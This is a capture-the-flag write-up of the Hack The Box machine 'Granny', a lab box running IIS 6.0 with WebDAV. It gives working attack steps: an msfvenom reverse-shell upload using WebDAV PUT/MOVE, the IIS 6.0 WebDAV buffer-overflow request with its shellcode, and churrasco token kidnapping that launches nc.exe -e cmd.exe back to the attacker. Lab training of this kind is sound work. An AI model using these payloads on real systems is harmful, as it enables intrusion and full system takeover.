Hack The Box - Granny Writeup (without MSF)

6 minute read

image1

Description:

This is an easy rated box but was kind of a medium easy box for me. Doing this box without metasploit as part of my OSCP preparation.

Enumeration

Add granny.htb to hosts and start an nmap scan.

Nmap

kali@kali:~$ nmap granny.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 07:27 EDT
Nmap scan report for granny.htb (10.10.10.15)
Host is up (0.27s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 33.22 seconds

Looking at the web application, we can see an IIS page. Lets do some more enumeration to dig some more information.

Nikito

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.15
+ Target Hostname:    granny.htb
+ Target Port:        80
+ Start Time:         2020-08-16 07:25:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
+ OSVDB-5646: HTTP method 'DELETE' allows clients to delete files on the web server.
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (PROPPATCH COPY MKCOL LOCK SEARCH UNLOCK PROPFIND listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 7941 requests: 0 error(s) and 32 item(s) reported on remote host
+ End Time:           2020-08-16 08:48:32 (GMT-4) (4986 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We can see that the box is running iis 6.0 and have webdav enabled. We can try out some enumeration using davtest

Davtest

********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://granny.htb
********************************************************
NOTE    Random string for this session: 01SI88JBfR
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://granny.htb/DavTestDir_01SI88JBfR
********************************************************
 Sending test files
PUT     pl      SUCCEED:        http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.pl
PUT     asp     FAIL
PUT     php     SUCCEED:        http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.php
PUT     jsp     SUCCEED:        http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.jsp
PUT     jhtml   SUCCEED:        http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.jhtml
PUT     cgi     FAIL
PUT     cfm     SUCCEED:        http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.cfm
PUT     shtml   FAIL
PUT     txt     SUCCEED:        http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.txt
PUT     aspx    FAIL
PUT     html    SUCCEED:        http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.html
********************************************************
 Checking for test file execution
EXEC    pl      FAIL
EXEC    php     FAIL
EXEC    jsp     FAIL
EXEC    jhtml   FAIL
EXEC    cfm     FAIL
EXEC    txt     SUCCEED:        http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.txt
EXEC    html    SUCCEED:        http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.html

********************************************************
/usr/bin/davtest Summary:
Created: http://granny.htb/DavTestDir_01SI88JBfR
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.pl
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.php
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.jsp
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.jhtml
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.cfm
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.txt
PUT File: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.html
Executes: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.txt
Executes: http://granny.htb/DavTestDir_01SI88JBfR/davtest_01SI88JBfR.html

We have permissions to write files with extensions of .txt and .html. But we can’t accomplish much with this. We have MOVE enabled. So what if we create a shell.txt file and move it to shell.aspx?

User Shell (Method 1 Webdav PUT/MOVE)

Cadaver

cadaver is a tool that can be used to interact with webdav to upload and move files.

  1. Create a aspx using msfvenom

     kali@kali:~/Desktop/htb/granny$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=8082  -f aspx -o shell.aspx
     [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
     [-] No arch selected, selecting arch: x86 from the payload
     No encoder specified, outputting raw payload
     Payload size: 324 bytes
     Final size of aspx file: 2740 bytes
     Saved as: shell.aspx
    
  2. upload the shell as txt file using cadaver and move it to shell.aspx
     kali@kali:~/Desktop/htb/granny$ cadaver granny.htb
     dav:/> put shell.txt
     Uploading shell.txt to `/shell.txt':
     Progress: [=============================>] 100.0% of 2740 bytes succeeded.
     dav:/> move shell.txt shell.aspx
     Moving `/shell.txt' to `/shell.aspx':  succeeded.
    
  3. Start a nc listener and browse the shell via browser
     kali@kali:~/Desktop/tools/win$ hip
     HTB IP:10.10.14.15/23
     kali@kali:~/Desktop/tools/win$ nc -lvp 8082
     listening on [any] 8082 ...
     connect to [10.10.14.15] from granny.htb [10.10.10.15] 1031
     Microsoft Windows [Version 5.2.3790]
     (C) Copyright 1985-2003 Microsoft Corp.
    
     c:\windows\system32\inetsrv>whoami
     whoami
     nt authority\network service
    
     c:\windows\system32\inetsrv>
    

    And we have a shell.

User Shell (Method 2 IIS 6.0 buffer overflow)

iis 6.0 has a buffer overflow related to webdav

Searchsploit

kali@kali:~/Desktop/htb/granny$ searchsploit iis 6.0 webdav buffer overflow
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow           | windows/remote/41738.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

A python exploit can be found here.

Start a listener and run the exploit with the kali machines ip and port.

kali@kali:~/Desktop/htb/granny$ python git.py
usage:iis6webdav.py targetip targetport reverseip reverseport

kali@kali:~/Desktop/htb/granny$ python git.py granny.htb 80 10.10.14.15 1337
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa₩ᄑᄄ￧ᄀᆪ￧ンᄀ￧トᄈ₩ᄂᄊ¦ンᄇ￧ᄄᄍ¦ᆳᄋ¦ᄑᄚ￧ユモ￧ᄅマ¦ᄀᄄ¥ルᆪ₩ᄉヤ₩ᄀナ ̄ᆬモ¥チᆲ¥ユᄃ₩ンᆪ ̄ヘᄂ¦リᄚ￧ᄀナ₩ᆬメ¥ミᄆ¦ᄆリ₩ᄅム￧ノチ¦ネᄆ￧タᄉ¥ᄀミ ̄ルᄂ₩ᄆヌ ̄ヤᄍ¥ムᆰ¥タᄡ¥ムテ￧ンメ¥チᄀ ̄ネᄇ₩ᄉヒ₩ᄚᄡ ̄ノヌ₩ノチ ̄ンヘ¥ナᄀ¥ᄀᄁ¦ンᄈ¥ノミ ̄ルᄚ￧ユト₩ᄀᆰ ̄ヘᄡ¦ᄍハ￧ᄀᆱ¦ᆬᄊ¦ᄍᄈ¦ᄆᆰ¥ンᄎ₩ᄑᄆ¥ᄀハ ̄ネᄚ ̄ンᆴ¦ᆳノ¥ノヘ¦ᄀᆪ₩ᄑフ￧ユヨ￧ユᄉ₩ルᆵ￧ルᄄ¦ムヘ¥チᄚ￧ᄄᄊ₩ノヒ₩ユラ￧ユミ₩ᄅᄇ￧ᄅᆱ￧ンᄁ￧ルリ₩ノネ₩ヤᄆ ̄チヤ₩ᄆᄍ¥チハ¥ムᄁ¥タᄈ ̄ユᄋ₩ᄅᄋ¦ナト ̄フᄡ₩ムᄊ¦ᄉニ¥ルヤ¦ンᆲ₩ユテ￧リᄇ￧ノᄌ¥ンᄅ¦フᄌ₩ノᄇ¥ᄄᄚ ¥ᄂᄌ¥ムネ￈ツ￈ツ£ヒタ₩ᅠテ₩ᄆト¥ノヨ¦ᆲᄋ₩ᄆᆳ¦ᄑリ¥ᄀレ￧ᆬミ¦ᆬᆰ¥ᄀマ¦ᄅメ¦ナミ₩ルヘ£マタ₩ᅠテ¦ᅠᄡ₩ヤᄆ₩ᄑテ₩ᄍᆭ￧ムチ¦ヘᆲ£マタ₩ᅠテ¥ヘテ₩ᄅチ￧チメ ̄フᄚ¥ᄀᆭ¦ノフ￧チヒ₩ヘニ¥ナᄈ￧ᆬチ￧ᄅミ¦ᄅᆲ> (Not <locktoken:write1>) <http://localhost/bbbbbbb￧ᆬネ₩ナᄉ¦ᄑテ₩ᄑᄃ₩ᆳᆵ¦ᄀナ ̄ルニ₩ンᄉ¦ミᄈ ̄ᄀᄆ¥ンᆬ¥ᄅᄁ¥ミᄉ¥ルᄀ₩ᆬメ₩ᄅモ¥ナラ ̄ᄀホ¥ᆬネ₩ヘユ¦ᆬᄆ¦ヘᄂ₩ムᄇ ̄ムᄄ¦ンリ￧ナᄍ ̄ヘᆱ₩ᆳユ₩ᄉネ¥チマ￧ᄅニ ̄ムᄆ₩ᄑヤ￧ムテ¥ᆬヨ₩ᄑᆵ￧ヘチ ̄ムラ₩ナᄄ￧ᄅᄇ ̄ンナ¦ᄉノ¥ンホ¥ムネ¦ᄚᄌ ̄ルᄎ ̄ユᄇ₩ノᆭ₩ᄍテ¦ᄀᆳ ̄ユネ₩ナᄋ¦ᄉレ ₩ナᄡ¦トᄈ¦ヘᆬ¥ノᄇ₩ᄉᄅ ̄ルᄆ¦ᄍᄂ₩ᄌᄍ₩ヘモ₩ᆳᄂ¥ナニ¦ᄐᄚ￧ᄀᆵ￧ノモ₩ンミ¦ユモ￧ᄅᆪ￧トᄍ¦ᄑモ¦ムヨ₩ᄐᄊ￧ヘᄍ₩ᄀᄋ￧ᄅヨ₩ナハ ̄ᆬナ ̄リᄍ₩ᄚᄍ¦ヤᄆ ̄ムᄇ¥ヘᆬ¥ᄀハ¦ムホ￧ᄅト₩ᄚᄉ¥ᄅヨ₩ノチ₩ᄍᄇ₩リᄆ¥ᆬル¥ミᄈ ̄ナツ¥ᄀᆬ¥ᆬチ￧ナミ ̄タᄊ¥ンᄋ¦ムラ¥ヘᄀ£マタ₩ᅠテ₩ᄍマ₩ᅠタ₩ᄍマ₩ᅠタ¦ノヌ￧ルᆰ£マタ₩ᅠテ ¦ノラ¦ᄑᄡ¥ᆬヌ¥ネᄡ¦ᆳᆭ¦ᆳツ￧ムᄂ￧ᄀᆵ₩ツツ₩ᅠチ¥トᄉ￧ノᄎ￧ムᄎ¦ᄉヌ¦ムル¥ンラ→トモ₩ᅠタ ̄ナᄊ₩ᄍᆵ¬モᆪ₩ᅠチ£ムᅠ₩ᅠテᅩタ￧﾿ᄒ￯﾿﾿￯﾿﾿£マタ₩ᅠテ￑ᆴ₩ᅠテ￧ナᆴ￧ムᄚ£ミᄡ₩ᅠテ¬ᄃᄃ₩ᅠチ←ホム₩ᅠタ ̄ᄂᄆ₩ルᆴ¦ᆬユ ̄チメ¥ムᆱ￧ルᆱ￧ノハ￧ᆬᄀ£ミワ₩ᅠテ₩ᄌナ₩ᅠタ￧ワᄇ￧ᆬᄄ¦ᄉᄅ ̄ルᆲ¦ムᄄ¦ᄉᄚ│ノニ₩ᅠタ¦ᄀᄋ ̄ノモ£ᄊᆰ₩ᅠツ ₩ᄑᆰ¦フᄉ£マᄌ₩ᅠテ¬ᄃᄃ₩ᅠチVVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>

Start a listener to receive the connections

kali@kali:~/Desktop/tools/win$ hip
HTB IP:10.10.14.15/23
kali@kali:~/Desktop/tools/win$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.15] from granny.htb [10.10.10.15] 1035
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

c:\windows\system32\inetsrv>

Root Shell

The box is missing quite a few updates. There are plethora of kernel exploits. I tried copying the binaries for the exploits, but none of them seems to work.

Windows server 2003 and 2008 have a token kidnapping vulnerability. We can execute the churrasco.exe binary to get system.

I was having trouble executing binaries copied to the system. I will be running binaries from impacket smb server.

We will be executing nc.exe to get a system shell.

c:\windows\system32\inetsrv>\\10.10.14.15\kali\churrasco.exe -d "\\10.10.14.15\kali\nc.exe -e cmd.exe 10.10.14.15 1234"
\\10.10.14.15\kali\churrasco.exe -d "\\10.10.14.15\kali\nc.exe -e cmd.exe 10.10.14.15 1234"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 680
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 688
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 696
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!

Receive the shell using nc

kali@kali:~/Desktop/tools/win$ nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.15] from granny.htb [10.10.10.15] 1038
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\TEMP>whoami
whoami
nt authority\system

C:\WINDOWS\TEMP>

And we are system!

Tags:

Categories:

Updated: